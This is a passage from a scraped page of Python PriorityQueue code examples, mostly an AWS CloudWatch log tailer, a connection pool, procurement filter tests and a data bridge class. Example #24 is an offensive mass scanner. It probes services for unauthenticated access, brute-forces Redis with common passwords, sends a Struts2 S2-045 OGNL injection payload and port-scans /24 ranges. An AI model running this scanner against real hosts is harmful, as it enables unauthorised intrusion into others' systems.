        register a new api call into ``publishers_queue`` using as weight
        the timestamp of the latest event."""
        while True:
            try:
                _, (log_group_name, log_stream_name,
                    next_token) = self.publishers_queue.get(block=False)
            except Empty:
                if self.watch:
                    gevent.sleep(self.WATCH_SLEEP)
                    continue
                else:
                    break

            response = self.connection.get_log_events(
                next_token=next_token,
                log_group_name=log_group_name,
                log_stream_name=log_stream_name,
                start_time=self.start,
                end_time=self.end,
                start_from_head=True)

            if not len(response['events']):
                self.stream_status[(log_group_name,
                                    log_stream_name)] = self.EXHAUSTED
                continue

            self.stream_status[(log_group_name, log_stream_name)] = self.ACTIVE

            for event in response['events']:
                event['group'] = log_group_name
                event['stream'] = log_stream_name
                self.raw_events_queue.put((event['timestamp'], event))
                self.stream_max_timestamp[(
                    log_group_name, log_stream_name)] = event['timestamp']

            if 'nextForwardToken' in response:
                self.publishers_queue.put((response['events'][-1]['timestamp'],
                                           (log_group_name, log_stream_name,
                                            response['nextForwardToken'])))

    def _get_min_timestamp(self):
        """Return the minimum timestamp available across all active streams."""
        pending = [
            self.stream_max_timestamp[k]
            for k, v in self.stream_status.iteritems() if v != self.EXHAUSTED
        ]
        return min(pending) if pending else None

    def _get_all_streams_exhausted(self):
        """Return if all streams are exhausted."""
        return all(
            (s == self.EXHAUSTED for s in self.stream_status.itervalues()))

    def _raw_events_queue_consumer(self):
        """Consume events from ``raw_events_queue`` if all active streams
        have already publish events up to the ``_get_min_timestamp`` and
        register them in order into ``events_queue``."""
        while True:
            if self._get_all_streams_exhausted(
            ) and self.raw_events_queue.empty():
                if self.watch:
                    gevent.sleep(self.WATCH_SLEEP)
                    continue
                self.events_queue.put(NO_MORE_EVENTS)
                break

            try:
                timestamp, line = self.raw_events_queue.peek(timeout=1)
            except Empty:
                continue

            min_timestamp = self._get_min_timestamp()
            if min_timestamp and min_timestamp < timestamp:
                gevent.sleep(0.3)
                continue

            timestamp, line = self.raw_events_queue.get()

            output = [line['message']]
            if self.output_stream_enabled:
                output.insert(
                    0,
                    self.color(
                        line['stream'].ljust(self.max_stream_length, ' '),
                        'cyan'))
            if self.output_group_enabled:
                output.insert(
                    0,
                    self.color(line['group'].ljust(self.max_group_length, ' '),
                               'green'))
            self.events_queue.put("{0}\n".format(' '.join(output)))

    def _events_consumer(self):
        """Print events from ``events_queue`` as soon as they are available."""
        while True:
            event = self.events_queue.get(True)
            if event == NO_MORE_EVENTS:
                break
            sys.stdout.write(event)
            sys.stdout.flush()

    def list_logs(self):
        self.register_publishers()

        pool = Pool(size=self.pool_size)
        pool.spawn(self._raw_events_queue_consumer)
        pool.spawn(self._events_consumer)

        if self.watch:
            pool.spawn(self.register_publishers_periodically)

        for i in xrange(self.pool_size):
            pool.spawn(self._publisher_queue_consumer)
        pool.join()

    def register_publishers(self):
        """Register publishers into ``publishers_queue``."""
        for group, stream in self._get_streams_from_patterns(
                self.log_group_name, self.log_stream_name):
            if (group, stream) in self.publishers:
                continue
            self.publishers.append((group, stream))
            self.max_group_length = max(self.max_group_length, len(group))
            self.max_stream_length = max(self.max_stream_length, len(stream))
            self.publishers_queue.put((0, (group, stream, None)))
            self.stream_status[(group, stream)] = self.ACTIVE
            self.stream_max_timestamp[(group, stream)] = -1

    def register_publishers_periodically(self):
        while True:
            self.register_publishers()
            gevent.sleep(2)

    def list_groups(self):
        """Lists available CloudWatch logs groups"""
        for group in self.get_groups():
            print group

    def list_streams(self, *args, **kwargs):
        """Lists available CloudWatch logs streams in ``log_group_name``."""
        for stream in self.get_streams(*args, **kwargs):
            print stream

    def get_groups(self):
        """Returns available CloudWatch logs groups"""
        next_token = None
        while True:
            response = self.connection.describe_log_groups(
                next_token=next_token)

            for group in response.get('logGroups', []):
                yield group['logGroupName']

            if 'nextToken' in response:
                next_token = response['nextToken']
            else:
                break

    def get_streams(self, log_group_name=None):
        """Returns available CloudWatch logs streams in ``log_group_name``."""
        log_group_name = log_group_name or self.log_group_name
        next_token = None
        window_start = self.start or 0
        window_end = self.end or sys.maxint

        while True:
            response = self.connection.describe_log_streams(
                log_group_name=log_group_name, next_token=next_token)

            for stream in response.get('logStreams', []):
                if max(stream['firstEventTimestamp'], window_start) <= \
                   min(stream['lastEventTimestamp'], window_end):
                    yield stream['logStreamName']

            if 'nextToken' in response:
                next_token = response['nextToken']
            else:
                break

    def color(self, text, color):
        """Returns coloured version of ``text`` if ``color_enabled``."""
        if self.color_enabled:
            return colored(text, color)
        return text

    def parse_datetime(self, datetime_text):
        """Parse ``datetime_text`` into a ``datetime``."""
        if not datetime_text:
            return None

        ago_match = re.match(
            r'(\d+)\s?(m|minute|minutes|h|hour|hours|d|day|days|w|week|weeks)(?: ago)?',
            datetime_text)
        if ago_match:
            amount, unit = ago_match.groups()
            amount = int(amount)
            unit = {'m': 60, 'h': 3600, 'd': 86400, 'w': 604800}[unit[0]]
            date = datetime.now() + timedelta(seconds=unit * amount * -1)
        else:
            try:
                date = parse(datetime_text)
            except ValueError:
                raise exceptions.UnknownDateError(datetime_text)

        return int(date.strftime("%s")) * 1000
Example #22
0
File: core.py  Project: antony-j/awslogs
class AWSLogs(object):

    ACTIVE = 1
    EXHAUSTED = 2
    WATCH_SLEEP = 2

    def __init__(self, **kwargs):
        self.connection_cls = kwargs.get('connection_cls', AWSConnection)
        self.aws_region = kwargs.get('aws_region')
        self.aws_access_key_id = kwargs.get('aws_access_key_id')
        self.aws_secret_access_key = kwargs.get('aws_secret_access_key')
        self.log_group_name = kwargs.get('log_group_name')
        self.log_stream_name = kwargs.get('log_stream_name')
        self.watch = kwargs.get('watch')
        self.color_enabled = kwargs.get('color_enabled')
        self.output_stream_enabled = kwargs.get('output_stream_enabled')
        self.output_group_enabled = kwargs.get('output_group_enabled')
        self.start = self.parse_datetime(kwargs.get('start'))
        self.end = self.parse_datetime(kwargs.get('end'))
        self.pool_size = max(kwargs.get('pool_size', 0), 10)
        self.max_group_length = 0
        self.max_stream_length = 0
        self.publishers = []
        self.events_queue = Queue()
        self.raw_events_queue = PriorityQueue()
        self.publishers_queue = PriorityQueue()
        self.publishers = []
        self.stream_status = {}
        self.stream_max_timestamp = {}
        self.connection = self.connection_cls(
            self.aws_region,
            aws_access_key_id=self.aws_access_key_id,
            aws_secret_access_key=self.aws_secret_access_key
        )

    def _get_streams_from_patterns(self, log_group_pattern, log_stream_pattern):
        """Returns pairs of group, stream matching ``log_group_pattern`` and
        ``log_stream_pattern``."""
        for group in self._get_groups_from_pattern(log_group_pattern):
            for stream in self._get_streams_from_pattern(group,
                                                         log_stream_pattern):
                yield group, stream

    def _get_groups_from_pattern(self, pattern):
        """Returns groups matching ``pattern``."""
        pattern = '.*' if pattern == 'ALL' else pattern
        reg = re.compile('^{0}'.format(pattern))
        for group in self.get_groups():
            if re.match(reg, group):
                yield group

    def _get_streams_from_pattern(self, group, pattern):
        """Returns streams in ``group`` matching ``pattern``."""
        pattern = '.*' if pattern == 'ALL' else pattern
        reg = re.compile('^{0}'.format(pattern))
        for stream in self.get_streams(group):
            if re.match(reg, stream):
                yield stream

    def _publisher_queue_consumer(self):
        """Consume ``publishers_queue`` api calls, run them and publish log
        events to ``raw_events_queue``. If ``nextForwardToken`` is present
        register a new api call into ``publishers_queue`` using as weight
        the timestamp of the latest event."""
        while True:
            try:
                _, (log_group_name, log_stream_name, next_token) = self.publishers_queue.get(block=False)
            except Empty:
                if self.watch:
                    gevent.sleep(self.WATCH_SLEEP)
                    # retry the queue; without this continue the code below
                    # would run with unbound variables
                    continue
                else:
                    break

            response = self.connection.get_log_events(
                next_token=next_token,
                log_group_name=log_group_name,
                log_stream_name=log_stream_name,
                start_time=self.start,
                end_time=self.end,
                start_from_head=True
            )

            if not len(response['events']):
                self.stream_status[(log_group_name, log_stream_name)] = self.EXHAUSTED
                continue

            self.stream_status[(log_group_name, log_stream_name)] = self.ACTIVE

            for event in response['events']:
                event['group'] = log_group_name
                event['stream'] = log_stream_name
                self.raw_events_queue.put((event['timestamp'], event))
                self.stream_max_timestamp[(log_group_name, log_stream_name)] = event['timestamp']

            if 'nextForwardToken' in response:
                self.publishers_queue.put(
                    (response['events'][-1]['timestamp'],
                     (log_group_name, log_stream_name, response['nextForwardToken']))
                )

    def _get_min_timestamp(self):
        """Return the minimum timestamp available across all active streams."""
        pending = [self.stream_max_timestamp[k] for k, v in self.stream_status.iteritems() if v != self.EXHAUSTED]
        return min(pending) if pending else None

    def _get_all_streams_exhausted(self):
        """Return if all streams are exhausted."""
        return all((s == self.EXHAUSTED for s in self.stream_status.itervalues()))

    def _raw_events_queue_consumer(self):
        """Consume events from ``raw_events_queue`` if all active streams
        have already publish events up to the ``_get_min_timestamp`` and
        register them in order into ``events_queue``."""
        while True:
            if self._get_all_streams_exhausted() and self.raw_events_queue.empty():
                if self.watch:
                    gevent.sleep(self.WATCH_SLEEP)
                    continue
                self.events_queue.put(NO_MORE_EVENTS)
                break

            try:
                timestamp, line = self.raw_events_queue.peek(timeout=1)
            except Empty:
                continue

            min_timestamp = self._get_min_timestamp()
            if min_timestamp and min_timestamp < timestamp:
                gevent.sleep(0.3)
                continue

            timestamp, line = self.raw_events_queue.get()

            output = [line['message']]
            if self.output_stream_enabled:
                output.insert(
                    0,
                    self.color(
                        line['stream'].ljust(self.max_stream_length, ' '),
                        'cyan'
                    )
                )
            if self.output_group_enabled:
                output.insert(
                    0,
                    self.color(
                        line['group'].ljust(self.max_group_length, ' '),
                        'green'
                    )
                )
            self.events_queue.put("{0}\n".format(' '.join(output)))

    def _events_consumer(self):
        """Print events from ``events_queue`` as soon as they are available."""
        while True:
            event = self.events_queue.get(True)
            if event == NO_MORE_EVENTS:
                break
            sys.stdout.write(event)
            sys.stdout.flush()

    def list_logs(self):
        self.register_publishers()

        pool = Pool(size=self.pool_size)
        pool.spawn(self._raw_events_queue_consumer)
        pool.spawn(self._events_consumer)

        if self.watch:
            pool.spawn(self.register_publishers_periodically)

        for i in xrange(self.pool_size):
            pool.spawn(self._publisher_queue_consumer)
        pool.join()

    def register_publishers(self):
        """Register publishers into ``publishers_queue``."""
        for group, stream in self._get_streams_from_patterns(self.log_group_name, self.log_stream_name):
            if (group, stream) in self.publishers:
                continue
            self.publishers.append((group, stream))
            self.max_group_length = max(self.max_group_length, len(group))
            self.max_stream_length = max(self.max_stream_length, len(stream))
            self.publishers_queue.put((0, (group, stream, None)))
            self.stream_status[(group, stream)] = self.ACTIVE
            self.stream_max_timestamp[(group, stream)] = -1

    def register_publishers_periodically(self):
        while True:
            self.register_publishers()
            gevent.sleep(2)

    def list_groups(self):
        """Lists available CloudWatch logs groups"""
        for group in self.get_groups():
            print group

    def list_streams(self, *args, **kwargs):
        """Lists available CloudWatch logs streams in ``log_group_name``."""
        for stream in self.get_streams(*args, **kwargs):
            print stream

    def get_groups(self):
        """Returns available CloudWatch logs groups"""
        next_token = None
        while True:
            response = self.connection.describe_log_groups(next_token=next_token)

            for group in response.get('logGroups', []):
                yield group['logGroupName']

            if 'nextToken' in response:
                next_token = response['nextToken']
            else:
                break

    def get_streams(self, log_group_name=None):
        """Returns available CloudWatch logs streams in ``log_group_name``."""
        log_group_name = log_group_name or self.log_group_name
        next_token = None

        while True:
            response = self.connection.describe_log_streams(
                log_group_name=log_group_name,
                next_token=next_token
            )

            for stream in response.get('logStreams', []):
                yield stream['logStreamName']

            if 'nextToken' in response:
                next_token = response['nextToken']
            else:
                break

    def color(self, text, color):
        """Returns coloured version of ``text`` if ``color_enabled``."""
        if self.color_enabled:
            return colored(text, color)
        return text

    def parse_datetime(self, datetime_text):
        """Parse ``datetime_text`` into a ``datetime``."""
        if not datetime_text:
            return None

        ago_match = re.match(r'(\d+)\s?(m|minute|minutes|h|hour|hours|d|day|days|w|week|weeks)(?: ago)?', datetime_text)
        if ago_match:
            amount, unit = ago_match.groups()
            amount = int(amount)
            unit = {'m': 60, 'h': 3600, 'd': 86400, 'w': 604800}[unit[0]]
            date = datetime.now() + timedelta(seconds=unit * amount * -1)
        else:
            try:
                date = parse(datetime_text)
            except ValueError:
                raise exceptions.UnknownDateError(datetime_text)

        return int(date.strftime("%s")) * 1000
Example #23
0
File: _pool.py  Project: NotSqrt/vaurien
class FactoryPool(object):

    def __init__(self, factory, maxsize=200, timeout=60):
        self.factory = factory
        self.maxsize = maxsize
        self.timeout = timeout
        self.clients = PriorityQueue(maxsize)
        # If there is a maxsize, prime the queue with empty slots.
        if maxsize is not None:
            for _ in xrange(maxsize):
                self.clients.put(EMPTY_SLOT)

    @contextlib.contextmanager
    def reserve(self):
        """Context-manager to obtain a Client object from the pool."""
        ts, client = self._checkout_connection()
        try:
            yield client
        finally:
            self._checkin_connection(ts, client)

    def _checkout_connection(self):
        # If there's no maxsize, no need to block waiting for a connection.
        blocking = self.maxsize is not None

        # Loop until we get a non-stale connection, or we create a new one.
        while True:
            try:
                ts, client = self.clients.get(blocking)
            except Empty:
                # No maxsize and no free connections, create a new one.
                # XXX TODO: we should be using a monotonic clock here.
                # see http://www.python.org/dev/peps/pep-0418/
                now = int(time.time())
                return now, self.factory()
            else:
                now = int(time.time())
                # If we got an empty slot placeholder, create a new connection.
                if client is None:
                    return now, self.factory()
                # If the connection is not stale, go ahead and use it.
                if ts + self.timeout > now:
                    return ts, client
                # Otherwise, the connection is stale.
                # Close it, push an empty slot onto the queue, and retry.
                if hasattr(client, 'disconnect'):
                    client.disconnect()

                self.clients.put(EMPTY_SLOT)
                continue

    def _checkin_connection(self, ts, client):
        """Return a connection to the pool."""
        if hasattr(client, '_closed') and client._closed:
            self.clients.put(EMPTY_SLOT)
            return

        # If the connection is now stale, don't return it to the pool.
        # Push an empty slot instead so that it will be refreshed when needed.
        now = int(time.time())
        if ts + self.timeout > now:
            self.clients.put((ts, client))
        else:
            if self.maxsize is not None:
                self.clients.put(EMPTY_SLOT)
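
A minimal usage sketch of the pool above (the lambda factory and use_client call are illustrative; EMPTY_SLOT is the placeholder constant the example imports from elsewhere). reserve() checks a (timestamp, client) pair out of the priority queue and checks it back in when the with-block exits:

pool = FactoryPool(factory=lambda: object(), maxsize=10, timeout=60)
with pool.reserve() as client:
    use_client(client)  # hypothetical caller code; the client returns to the pool afterwards
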
Example #24
0
class Scanner:
    def __init__(self):
        self.start_time = time.time()
        self.queue = PriorityQueue()
        self.history = []
        self.total_count = 0
        self.scan_count = 0
        self._load_target()
        self.outfile = open("log.log", 'w')
        self.console_width = getTerminalSize()[0] - 2

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            msg = '%s TotalCount| %s Scanned in %.2f seconds' % (
                self.total_count, self.total_count - self.queue.qsize(),
                time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                             msg)
        else:
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)) + '\n')
            self.outfile.write(_msg + '\n')
            self.outfile.flush()
            if _found_msg:
                msg = '%s TotalCount| %s Scanned in %.2f seconds' % (
                    self.total_count, self.total_count - self.queue.qsize(),
                    time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                                 msg)
        sys.stdout.flush()

    def _load_target(self):
        print('[+] Read targets ...')
        target_file = raw_input("Target File :")
        with open(target_file) as f:
            for line in f:
                target = line.strip()
                self.queue.put(target)

        print("TotalCount is %d" % self.queue.qsize())
        self.total_count = self.queue.qsize()
        print("Now scanning ...")

    def _scan(self, case):
        while not self.queue.empty():
            target = self.queue.get()
            if case == "1":
                self.vulnCheck(target)
            if case == "2":
                self.s2_045(target)
            if case == "3":
                self.headers(target)
            if case == "4":
                self.weakfile(target)
            if case == "5":
                self.portscan_c(target)

    def vulnCheck(self, target):
        if ":2375" in target:
            try:
                res = requests.head("http://" + str(target) +
                                    "/containers/json",
                                    timeout=2)
                if res.headers['Content-Type'] == 'application/json':
                    self._print_msg(target + "==>  docker api Vuln", True)
                else:
                    self._print_msg()
            except:
                self._print_msg()
            self._print_msg()

        if ":27017" in target:
            ip, port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                data = binascii.a2b_hex(
                    "3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000"
                )
                s.send(data)
                result = s.recv(1024)
                if "ismaster" in result:
                    getlog_data = binascii.a2b_hex(
                        "480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000"
                    )
                    s.send(getlog_data)
                    result = s.recv(1024)
                    if "totalLinesWritten" in result:
                        self._print_msg(target + "==>  mongodb Vuln", True)
            except Exception as e:
                pass

        if ":6379" in target:
            ip, port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("INFO\r\n")
                result = s.recv(1024)
                if "redis_version" in result:
                    self._print_msg(target + "==>  redis Vuln", True)
                elif "Authentication" in result:
                    for pass_ in ['123456', 'redis', 'pass', 'password']:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        s.connect((ip, int(port)))
                        s.send("AUTH %s\r\n" % (pass_))
                        result = s.recv(1024)
                        if '+OK' in result:
                            self._print_msg(
                                target + "==>  redis pass Vuln :" + pass_,
                                True)
            except Exception as e:
                pass
        if ":11211" in target:
            ip, port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("stats\r\n")
                result = s.recv(1024)
                if "STAT version" in result:
                    self._print_msg(target + "==>  memcache Vuln", True)
            except Exception as e:
                pass

        if ":9200" in target:
            try:
                res = requests.head("http://" + str(target) +
                                    "/_rvier/_search",
                                    timeout=2)
                if res.status_code == 200:
                    self._print_msg(target + "==>  Elasticsearch Vuln", True)
                else:
                    self._print_msg()
            except:
                self._print_msg()
            self._print_msg()

    def headers(self, target):
        try:
            res = requests.head("http://" + str(target), timeout=1)
            self._print_msg(target + "==>" + str(res.headers), True)
        except:
            self._print_msg()
        self._print_msg()

    def s2_045(self, target):
        try:
            data = {"image": " "}
            headers = {
                "User-Agent":
                "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
                "Content-Type":
                "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vul','s2-045')}.multtargetart/form-data"
            }
            req = requests.post("http://" + str(target),
                                data=data,
                                headers=headers)
            if req.headers["vul"] == "s2-045":
                self._print_msg(target + "==>" + "S2-045 Vuln", True)
        except:
            self._print_msg()
        self._print_msg()

    def weakfile(self, target):
        weaklist = ["robots.txt", "/i.php", "/phpinfo.php"]
        for weakfile in weaklist:
            try:
                res = requests.head("http://" + str(target) + weakfile,
                                    timeout=1)
                if res.status_code == 200:
                    if ("User-agent" in res.content) or ("phpinfo"
                                                         in res.content):
                        self._print_msg("http://" + target + weakfile, True)
            except:
                self._print_msg()
        self._print_msg()

    def portscan_c(self, target):
        ip = socket.gethostbyname(target)
        ports = [1433, 2375, 3306, 6379, 9200, 11211, 27017]
        ip = ip.split(".")
        ipc = ip[0] + "." + ip[1] + "." + ip[2] + "."
        if ipc in self.history:
            return
        else:
            self.history.append(ipc)

        for port in ports:
            for i in range(255):
                try:
                    cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    cs.settimeout(float(2.5))
                    address = (ipc + str(i), int(port))
                    status = cs.connect_ex((address))
                    if status == 0:
                        self._print_msg(ipc + str(i) + ":" + str(port), True)
                except Exception as e:
                    pass

                finally:
                    cs.close()
                self._print_msg()

    def run(self, case):
        threads = [gevent.spawn(self._scan, case) for i in xrange(1000)]
        gevent.joinall(threads)  # block until every scanner greenlet finishes
Example #25
0
class TestResourceFilters(unittest.TestCase):
    db = {}
    conf = CONFIG

    @patch('openprocurement.bridge.basic.filters.INFINITY')
    @patch('openprocurement.bridge.basic.filters.logger')
    def test_JMESPathFilter(self, logger, infinity):
        self.input_queue = PriorityQueue()
        self.filtered_queue = PriorityQueue()

        resource = self.conf['resource'][:-1]
        jmes_filter = JMESPathFilter(self.conf, self.input_queue, self.filtered_queue, self.db)
        mock_calls = [call.info('Init Close Framework Agreement JMESPath Filter.')]
        self.assertEqual(logger.mock_calls, mock_calls)
        extra = {'MESSAGE_ID': 'SKIPPED', 'JOURNAL_{}_ID'.format(resource.upper()): 'test_id'}

        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()

        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'status': 'draft.pending'
        }

        self.input_queue.put((None, doc))
        self.db['test_id'] = '1970-01-01'
        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()
        mock_calls.append(
            call.info('{} test_id not modified from last check. Skipping'.format(resource.title()),
                      extra=extra)
        )
        self.assertEqual(logger.mock_calls, mock_calls)

        # no filters
        doc['dateModified'] = '1970-01-02'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()
        mock_calls.append(
            call.debug('Put to filtered queue {} test_id {}'.format(resource, doc['status']))
        )
        self.assertEqual(logger.mock_calls, mock_calls)
        priority, filtered_doc = self.filtered_queue.get()
        self.assertIsNone(priority)
        self.assertEqual(filtered_doc, doc)

        # not found
        jmes_filter.filters = [jmespath.compile("contains([`test_status`], status)")]
        doc['status'] = 'spam_status'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()
        mock_calls.append(
            call.info('Skip {} test_id'.format(resource),
                      extra=extra)
        )

        # has found
        doc['status'] = 'test_status'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()
        mock_calls.append(
            call.debug('Put to filtered queue {} test_id {}'.format(resource, doc['status']))
        )
        self.assertEqual(logger.mock_calls, mock_calls)
        priority, filtered_doc = self.filtered_queue.get()
        self.assertIsNone(priority)
        self.assertEqual(filtered_doc, doc)
Example #26
0
class TestContractProformaFilter(unittest.TestCase):
    conf = CONFIG
    db = {}

    @patch('openprocurement.bridge.templatesregistry.filters.INFINITY')
    def test_init(self, infinity):
        self.input_queue = PriorityQueue()
        self.filtered_queue = PriorityQueue()

        filter = ContractProformaFilter(self.conf, self.input_queue,
                                        self.filtered_queue, self.db)

        # Valid tender filtering
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-02',
            'procurementMethodType': 'dgf',
            'status': 'status1',
            'documents': [{
                'documentType': 'contractProforma'
            }]
        }

        self.input_queue.put((None, deepcopy(doc)))
        filter._run()
        self.assertEqual(len(self.filtered_queue), 1)
        filtered_doc = self.filtered_queue.get(block=False)
        self.assertEqual(doc, filtered_doc[1])

        # Not changed dateModified
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status1',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }

        self.input_queue.put((None, deepcopy(doc)))
        self.db['test_id'] = '1970-01-01'

        filter._run()
        self.assertEqual(len(self.filtered_queue), 0)

        self.db.pop('test_id')

        # No contractProforma doc
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status1',
            'documents': [{
                'documentType': 'notContractProforma'
            }],
        }

        filter._run()
        self.assertEqual(len(self.filtered_queue), 0)

        # Wrong tender status
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status3',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }

        self.input_queue.put((None, deepcopy(doc)))

        filter._run()
        self.assertEqual(len(self.filtered_queue), 0)

        # Wrong procurementMethodType without appropriate status
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'other_pmt',
            'status': 'status1',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }
        self.input_queue.put((None, deepcopy(doc)))

        filter._run()
        self.assertEqual(len(self.filtered_queue), 0)

        # Wrong procurementMethodType with appropriate status
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'other_pmt',
            'status': 'status2',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }
        self.input_queue.put((None, deepcopy(doc)))

        filter._run()
        self.assertEqual(len(self.filtered_queue), 1)
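
The bridge below sizes its queues with a -1 convention: -1 means unbounded, while any other value caps the queue so that put() blocks (or raises Full when called with block=False) once the cap is reached. A minimal sketch, assuming gevent is installed:

from gevent.queue import PriorityQueue, Full

bounded = PriorityQueue(2)
bounded.put((0, 'a'))
bounded.put((1, 'b'))
try:
    bounded.put((2, 'c'), block=False)
except Full:
    print 'queue is full'
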
Example #27
0
class EdgeDataBridge(object):
    """Edge Bridge"""
    def __init__(self, config):
        super(EdgeDataBridge, self).__init__()
        self.config = config
        self.workers_config = {}
        self.bridge_id = uuid.uuid4().hex
        self.api_host = self.config_get('resources_api_server')
        self.api_version = self.config_get('resources_api_version')
        self.retrievers_params = self.config_get('retrievers_params')

        # Check up_wait_sleep
        up_wait_sleep = self.retrievers_params.get('up_wait_sleep')
        if up_wait_sleep is not None and up_wait_sleep < 30:
            raise DataBridgeConfigError('Invalid \'up_wait_sleep\' in '
                                        '\'retrievers_params\'. Value must be '
                                        'at least 30.')

        # Workers settings
        for key in WORKER_CONFIG:
            self.workers_config[key] = (self.config_get(key)
                                        or WORKER_CONFIG[key])

        # Init config
        for key in DEFAULTS:
            setattr(self, key, self.config_get(key) or DEFAULTS[key])

        # Pools
        self.workers_pool = gevent.pool.Pool(self.workers_max)
        self.retry_workers_pool = gevent.pool.Pool(self.retry_workers_max)
        self.filter_workers_pool = gevent.pool.Pool(self.filter_workers_count)

        # Queues
        if self.input_queue_size == -1:
            self.input_queue = PriorityQueue()
        else:
            self.input_queue = PriorityQueue(self.input_queue_size)

        if self.resource_items_queue_size == -1:
            self.resource_items_queue = PriorityQueue()
        else:
            self.resource_items_queue = PriorityQueue(
                self.resource_items_queue_size)

        self.api_clients_queue = Queue()
        # self.retry_api_clients_queue = Queue()

        if self.retry_resource_items_queue_size == -1:
            self.retry_resource_items_queue = PriorityQueue()
        else:
            self.retry_resource_items_queue = PriorityQueue(
                self.retry_resource_items_queue_size)

        if self.api_host != '' and self.api_host is not None:
            api_host = urlparse(self.api_host)
            if api_host.scheme == '' and api_host.netloc == '':
                raise DataBridgeConfigError(
                    'Invalid \'tenders_api_server\' url.')
        else:
            raise DataBridgeConfigError('Empty or missing '
                                        '\'tenders_api_server\' in config '
                                        'dictionary.')
        self.db = prepare_couchdb(self.couch_url, self.db_name, logger)
        db_url = self.couch_url + '/' + self.db_name
        prepare_couchdb_views(db_url, self.workers_config['resource'], logger)
        self.server = Server(self.couch_url,
                             session=Session(retry_delays=range(10)))
        self.view_path = '_design/{}/_view/by_dateModified'.format(
            self.workers_config['resource'])
        extra_params = {
            'mode': self.retrieve_mode,
            'limit': self.resource_items_limit
        }
        self.feeder = ResourceFeeder(host=self.api_host,
                                     version=self.api_version,
                                     key='',
                                     resource=self.workers_config['resource'],
                                     extra_params=extra_params,
                                     retrievers_params=self.retrievers_params,
                                     adaptive=True,
                                     with_priority=True)
        self.api_clients_info = {}

    def config_get(self, name):
        try:
            return self.config.get('main').get(name)
        except AttributeError:
            raise DataBridgeConfigError('Missing section \'main\' in config'
                                        ' dictionary')

    def create_api_client(self):
        client_user_agent = self.user_agent + '/' + self.bridge_id
        timeout = 0.1
        while 1:
            try:
                api_client = APIClient(
                    host_url=self.api_host,
                    user_agent=client_user_agent,
                    api_version=self.api_version,
                    key='',
                    resource=self.workers_config['resource'])
                client_id = uuid.uuid4().hex
                logger.info('Started api_client {}'.format(
                    api_client.session.headers['User-Agent']),
                            extra={'MESSAGE_ID': 'create_api_clients'})
                api_client_dict = {
                    'id': client_id,
                    'client': api_client,
                    'request_interval': 0,
                    'not_actual_count': 0
                }
                self.api_clients_info[api_client_dict['id']] = {
                    'drop_cookies': False,
                    'request_durations': {},
                    'request_interval': 0,
                    'avg_duration': 0
                }
                self.api_clients_queue.put(api_client_dict)
                break
            except RequestFailed as e:
                logger.error(
                    'Failed to start api_client with status code {}'.format(
                        e.status_code),
                    extra={'MESSAGE_ID': 'exceptions'})
                timeout = timeout * 2
                logger.info(
                    'create_api_client will sleep for {} sec.'.format(timeout))
                sleep(timeout)
            except Exception as e:
                logger.error('Failed to start api_client with error: {}'.format(
                    e.message),
                             extra={'MESSAGE_ID': 'exceptions'})
                timeout = timeout * 2
                logger.info(
                    'create_api_client will sleep for {} sec.'.format(timeout))
                sleep(timeout)

    def fill_api_clients_queue(self):
        while self.api_clients_queue.qsize() < self.workers_min:
            self.create_api_client()

    def fill_input_queue(self):
        for resource_item in self.feeder.get_resource_items():
            self.input_queue.put(resource_item)
            logger.debug('Add to temp queue from sync: {} {} {}'.format(
                self.workers_config['resource'][:-1], resource_item[1]['id'],
                resource_item[1]['dateModified']),
                         extra={
                             'MESSAGE_ID': 'received_from_sync',
                             'TEMP_QUEUE_SIZE': self.input_queue.qsize()
                         })

    def send_bulk(self, input_dict, priority_cache):
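        # Documenting existing behaviour: query the CouchDB by_dateModified
        # view once per bulk, retrying up to three times with doubling
        # backoff; items whose stored dateModified already matches are
        # skipped, the rest are queued with the priority cached when they
        # arrived from sync.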
        sleep_before_retry = 2
        for i in xrange(0, 3):
            try:
